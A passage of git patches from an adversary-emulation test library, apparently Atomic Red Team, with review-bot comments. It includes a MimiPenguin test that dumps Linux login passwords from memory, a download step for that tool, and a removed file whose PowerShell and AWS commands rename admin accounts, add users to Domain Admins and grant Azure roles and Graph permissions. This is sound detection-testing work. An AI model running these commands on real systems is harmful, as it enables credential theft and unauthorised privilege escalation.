+ +## Atomic Test #3 - Capture Passwords with MimiPenguin +MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). +Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. +See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. +See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt| +| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +sudo #{MimiPenguin_Location} > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```bash +rm -f #{output_file} > /dev/null +``` + + + +#### Dependencies: Run with `sh`! 
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location}) +##### Check Prereq Commands: +```sh +if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz +mkdir /tmp/mimipenguin +tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin +``` +##### Description: Strings must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install binutils +``` +##### Description: Python2 must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install python2 +``` +##### Description: Libc-bin must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install libc-bin +``` + + + +
From 4e7a2ed599855de2ec0068704ac779d75efcc7a8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Mar 2022 14:02:31 -0700 Subject: [PATCH 21/83] fix prereq for screenshot test (#1805) --- atomics/T1113/T1113.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index a40676e3..fd54b103 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -86,7 +86,7 @@ atomic_tests: prereq_command: | if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi get_prereq_command: | - sudo apt-get -y install graphicsmagick-imagemagick-compat + sudo apt install graphicsmagick-imagemagick-compat executor: command: | import -window root #{output_file} From 8aedc6cdd9280e1356977e06c89d5eea60d128d0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Mar 2022 21:03:01 +0000 Subject: [PATCH 22/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1113/T1113.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 26376790..66dce2ee 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -10238,7 +10238,7 @@ collection: 1; fi ' - get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat + get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat ' executor: diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 0e5258c7..30ec4679 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -186,7 +186,7 @@ if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash -sudo apt-get -y install graphicsmagick-imagemagick-compat +sudo apt install graphicsmagick-imagemagick-compat ``` From 8578fc33086df055d97adb81dc142c6700b3a4c4 Mon Sep 17 00:00:00 2001 
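Review bot: Dropping `-y` from the get_prereq_command in the T1113 hunk makes `apt install` stop at its confirmation prompt when it needs to pull in extra packages, so under a non-interactive runner such as Invoke-AtomicTest the prerequisite install can abort or hang, and `apt` itself warns that its CLI is not stable for use in scripts. If the switch to `apt` was deliberate, `sudo apt install -y graphicsmagick-imagemagick-compat` keeps the non-interactive behaviour; otherwise the previous `apt-get -y` form is the safer choice for scripted use. The generated docs in the following patch inherit the same line.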
From: WojciechLesicki Date: Fri, 11 Mar 2022 23:52:07 +0100 Subject: [PATCH 23/83] Correct description --- atomics/T1098/T1098.yaml | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 2060dac5..d1bfd288 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -416,9 +416,20 @@ atomic_tests: name: powershell elevation_required: false -- name: Azure - adding permission to application +- name: AzureAD - adding permission to application description: | - The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor + The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. + You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. + The DirectoryRecommendations.Read.All permissions have been selected as the default + + The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. + + Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. + You can also take a look at the materials: + https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/ + https://github.com/reprise99/Sentinel-Queries + https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766 + https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb supported_platforms: - azure-ad input_arguments: From 30af70bef9c438c53a9479fb353865c1de965d67 Mon Sep 17 00:00:00 2001 
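Review bot: The detection hint added in this hunk sends defenders to the subscription Activity Logs for "Add app role assignment to service principal", but as far as I can tell that operation is recorded as an Azure AD audit activity (application management) rather than a subscription-level event, so the hint points at the wrong log; the neighbouring role-assignment tests in this file word it as `Detection hint - check Activity "..." in Azure AD Audit Logs`, and this one should match. The new description also has several wording errors: `The adversarie want to add permission to new created application` reads better as `The adversary wants to add permissions to a newly created application`, `Application could be then use for persistence` as `The application could then be used for persistence`, and `Get-AzureADApplication instead New-AzureADServicePrincipal` as `Get-AzureADApplication instead of New-AzureADServicePrincipal`. The input_arguments and executor this description refers to continue outside the hunk.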
From: WojciechLesicki Date: Fri, 11 Mar 2022 23:52:07 +0100 Subject: [PATCH 24/83] Removing md file --- atomics/T1098/T1098.md | 648 ----------------------------------------- 1 file changed, 648 deletions(-) delete mode 100644 atomics/T1098/T1098.md diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md deleted file mode 100644 index cc23378d..00000000 --- a/atomics/T1098/T1098.md +++ /dev/null @@ -1,648 +0,0 @@ -# T1098 - Account Manipulation -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098) -
Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
- -## Atomic Tests - -- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) - -- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate) - -- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group) - -- [Atomic Test #4 - Azure - adding user to Azure AD role](#atomic-test-4---azure---adding-user-to-azure-ad-role) - -- [Atomic Test #5 - Azure - adding service principal to Azure AD role](#atomic-test-5---azure---adding-service-principal-to-azure-ad-role) - -- [Atomic Test #6 - Azure - adding user to Azure role in subscription](#atomic-test-6---azure---adding-user-to-azure-role-in-subscription) - -- [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription) - -- [Atomic Test #8 - Azure - adding permission to application](#atomic-test-8---azure---adding-permission-to-application) - - -
- -## Atomic Test #1 - Admin Account Manipulate -Manipulate Admin Account Name - -**Supported Platforms:** Windows - - -**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af - - - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - - -```powershell -$x = Get-Random -Minimum 2 -Maximum 9999 -$y = Get-Random -Minimum 2 -Maximum 9999 -$z = Get-Random -Minimum 2 -Maximum 9999 -$w = Get-Random -Minimum 2 -Maximum 9999 -Write-Host HaHa_$x$y$z - -$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name - -foreach($member in $fmm) { - if($member -like "*Administrator*") { - $account = $member.Name -replace ".+\\\","" # strip computername\ - $originalDescription = (Get-LocalUser -Name $account).Description - Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description - Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation - Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME - } - } -``` - -#### Cleanup Commands: -```powershell -$list = Get-LocalUser |?{$_.Description -like "atr:*"} -foreach($u in $list) { - $u.Description -match "atr:(?[^;]+);(?.*)" - Set-LocalUser -Name $u.Name -Description $Matches.Description - Rename-LocalUser -Name $u.Name -NewName $Matches.Name - Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME -} -``` - - - - - -
-
- -## Atomic Test #2 - Domain Account and Group Manipulate -Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). - -The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, -you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to -create the user and alter the group. Automatic installation of the dependency requires an elevated session, -and is unlikely to work with Powershell Core (untested). - -If you consider running this test against a production Active Directory, the good practise is to create a dedicated -service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated -as group manager of the target group. - -Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` - -**Supported Platforms:** Windows - - -**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on -a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-| -| group | Name of the group to alter | String | Domain Admins| -| create_args | Additional string appended to New-ADUser call | String | | - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -$x = Get-Random -Minimum 2 -Maximum 99 -$y = Get-Random -Minimum 2 -Maximum 99 -$z = Get-Random -Minimum 2 -Maximum 99 -$w = Get-Random -Minimum 2 -Maximum 99 - -Import-Module ActiveDirectory -$account = "#{account_prefix}-$x$y$z" -New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} -Add-ADGroupMember "#{group}" $account -``` - -#### Cleanup Commands: -```powershell -Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: PS Module ActiveDirectory -##### Check Prereq Commands: -```powershell -Try { - Import-Module ActiveDirectory -ErrorAction Stop | Out-Null - exit 0 -} -Catch { - exit 1 -} -``` -##### Get Prereq Commands: -```powershell -if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { - Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online -} else { - Install-WindowsFeature RSAT-AD-PowerShell -} -``` - - - - -
-
- -## Atomic Test #3 - AWS - Create a group and add a user to that group -Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - -**Supported Platforms:** Iaas:aws - - -**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Name of the AWS group to create | String | atomicredteam| - - -#### Attack Commands: Run with `sh`! - - -```sh -aws iam create-group --group-name #{username} -aws iam add-user-to-group --user-name #{username} --group-name #{username} -``` - -#### Cleanup Commands: -```sh -aws iam remove-user-from-group --user-name #{username} --group-name #{username} -aws iam delete-group --group-name #{username} -``` - - - -#### Dependencies: Run with `sh`! -##### Description: Check if the user exists, we can only add a user to a group if the user exists. -##### Check Prereq Commands: -```sh -aws iam list-users | grep #{username} -``` -##### Get Prereq Commands: -```sh -echo Please run atomic test T1136.003, before running this atomic test -``` - - - - -
-
- -## Atomic Test #4 - Azure - adding user to Azure AD role -The adversarie want to add user to some Azure AD role. Threat actor -may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, -Privileged authentication administrator (this role can reset Global Administrator password!). -By default, the role Global Reader is assigned to service principal in this test. - -The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. - -Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type. - -**Supported Platforms:** Azure-ad - - -**auto_generated_guid:** 0e65ae27-5385-46b4-98ac-607a8ee82261 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Azure AD username | String | jonh@contoso.com| -| password | Azure AD password | String | p4sswd| -| user_principal_name | Name of the targeted user (user principal) | String | SuperUser| -| role_name | Name of the targed Azure AD role | String | Global Reader| - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -Import-Module -Name AzureAD -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzureAD -Credential $Credential - -$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} -if ($user -eq $null) { Write-Warning "User not found"; exit } -$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } -Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId -Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role" -``` - -#### Cleanup Commands: -```powershell -Import-Module -Name AzureAD -ErrorAction Ignore -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzureAD -Credential $Credential -ErrorAction Ignore - -$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} -if ($user -eq $null) { Write-Warning "User not found"; exit } -$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId -Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role" -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: AzureAD module must be installed. -##### Check Prereq Commands: -```powershell -try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -``` -##### Get Prereq Commands: -```powershell -Install-Module -Name AzureAD -Force -``` - - - - -
-
- -## Atomic Test #5 - Azure - adding service principal to Azure AD role -The adversarie want to add service principal to some Azure AD role. Threat actor -may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, -Privileged authentication administrator (this role can reset Global Administrator password!). -By default, the role Global Reader is assigned to service principal in this test. - -The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. - -Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type. - -**Supported Platforms:** Azure-ad - - -**auto_generated_guid:** 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Azure AD username | String | jonh@contoso.com| -| password | Azure AD password | String | p4sswd| -| service_principal_name | Name of the service principal | String | SuperSP| -| role_name | Name of the targed Azure AD role | String | Global Reader| - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -Import-Module -Name AzureAD -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzureAD -Credential $Credential - -$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} -if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } -$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } -Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId -Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)" -``` - -#### Cleanup Commands: -```powershell -Import-Module -Name AzureAD -ErrorAction Ignore -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzureAD -Credential $Credential -ErrorAction Ignore - -$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} -if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } -$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId -Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role" -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: AzureAD module must be installed. -##### Check Prereq Commands: -```powershell -try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -``` -##### Get Prereq Commands: -```powershell -Install-Module -Name AzureAD -Force -``` - - - - -
-
- -## Atomic Test #6 - Azure - adding user to Azure role in subscription -The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor -may be interested primarily in highly privileged roles, e.g. Owner, Contributor. -By default, the role Reader is assigned to user in this test. - -New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - -The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write -(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All -and Microsoft Graph Directory.Read.All permissions. - -Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs. - -**Supported Platforms:** Iaas:azure - - -**auto_generated_guid:** 1a94b3fc-b080-450a-b3d8-6d9b57b472ea - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Azure AD username | String | jonh@contoso.com| -| password | Azure AD password | String | p4sswd| -| user_principal_name | Name of the targeted user (user principal) | String | SuperUser| -| role_name | Name of the targed Azure role | String | Reader| -| subscription | Name of the targed subscription | String | Azure subscription 1| - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -Import-Module -Name Az.Resources -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzAccount -Credential $Credential - -$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} -if ($user -eq $null) { Write-Warning "User not found"; exit } -$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} -if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } -$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription -Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)" -``` - -#### Cleanup Commands: -```powershell -Import-Module -Name AzureAD -ErrorAction Ignore -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzAccount -Credential $Credential -ErrorAction Ignore - -$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} -if ($user -eq $null) { Write-Warning "User not found"; exit } -$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} -if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } -$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription -Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)" -``` - - - -#### 
Dependencies: Run with `powershell`! -##### Description: Az.Resources module must be installed. -##### Check Prereq Commands: -```powershell -try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -``` -##### Get Prereq Commands: -```powershell -Install-Module -Name Az.Resources -Force -``` - - - - -
-
- -## Atomic Test #7 - Azure - adding service principal to Azure role in subscription -The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor -may be interested primarily in highly privileged roles, e.g. Owner, Contributor. -By default, the role Reader is assigned to service principal in this test. - -New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - -The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write -(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All -and Microsoft Graph Directory.Read.All permissions. - -Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs. - -**Supported Platforms:** Iaas:azure - - -**auto_generated_guid:** c8f4bc29-a151-48da-b3be-4680af56f404 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Azure AD username | String | jonh@contoso.com| -| password | Azure AD password | String | p4sswd| -| service_principal_name | Name of the service principal | String | SuperSP| -| role_name | Name of the targed Azure role | String | Reader| -| subscription | Name of the targed subscription | String | Azure subscription 1| - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -Import-Module -Name Az.Resources -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzAccount -Credential $Credential - -$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} -if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } -$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} -if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } -$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription -Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)" -``` - -#### Cleanup Commands: -```powershell -Import-Module -Name AzureAD -ErrorAction Ignore -$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force -$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword -Connect-AzAccount -Credential $Credential -ErrorAction Ignore - -$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} -if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } -$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} -if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } -$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} -if ($role -eq $null) { Write-Warning "Role not found"; exit } - -Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription -Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in 
subscriptions $($subscriptions.Name)" -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: Az.Resources module must be installed. -##### Check Prereq Commands: -```powershell -try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -``` -##### Get Prereq Commands: -```powershell -Install-Module -Name Az.Resources -Force -``` - - - - -
- -## Atomic Test #8 - Azure - adding permission to application -The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. -You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. -The DirectoryRecommendations.Read.All permissions have been selected as the default - -The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. - -Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. -You can also take a look at the materials:
-https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
-https://github.com/reprise99/Sentinel-Queries
-https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
-https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
- -**Supported Platforms:** Azure-ad - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| username | Azure AD username | String | jonh@contoso.com| -| password | Azure AD password | String | p4sswd| -| application_name | Name of the targeted application | String | test_app| -| application_permission | Permission from Microsoft Graph Resource API that will be add to application from | String | DirectoryRecommendations.Read.All| - - -#### Attack Commands: Run with `powershell`! - -```powershell -Import-Module -Name AzureAD - $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force - $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword - Connect-AzureAD -Credential $Credential - - $aadApplication = New-AzureADApplication -DisplayName "#{application_name}" - $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId - #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} - - #Get Service Principal of Microsoft Graph Resource API - $graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"} - - #Initialize RequiredResourceAccess for Microsoft Graph Resource API - $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess - $requiredGraphAccess.ResourceAppId = $graphSP.AppId - $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess] - - #Set Application Permissions - $ApplicationPermissions = @('#{application_permission}') - - $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions} - if($reqPermission) - { - $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess - $resourceAccess.Type = "Role" - $resourceAccess.Id = $reqPermission.Id - #Add required app permission - 
$requiredGraphAccess.ResourceAccess.Add($resourceAccess) - } - else - { - Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red - } - - #Add required resource accesses - $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess] - $requiredResourcesAccess.Add($requiredGraphAccess) - - #Set permissions in existing Azure AD App - Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess - - $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId} - - New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id -``` - -#### Cleanup Commands: -```powershell -Import-Module -Name AzureAD - $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force - $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword - Connect-AzureAD -Credential $Credential - - $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} - Remove-AzureADApplication -ObjectId $aadApplication.ObjectId -``` - - -#### Dependencies: Run with `powershell`! -##### Description: AzureAD module must be installed. -##### Check Prereq Commands: -```powershell -try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -``` -##### Get Prereq Commands: -```powershell -Install-Module -Name AzureAD -Force -``` - -
-
From d1e3e11730fe84222f92b1a488b3876d4ca6a566 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 14 Mar 2022 10:43:19 -0600 Subject: [PATCH 25/83] AD Searching and powerview (#1806) * ADSI * new atomics
---
 atomics/T1018/T1018.yaml | 12 ++++++++
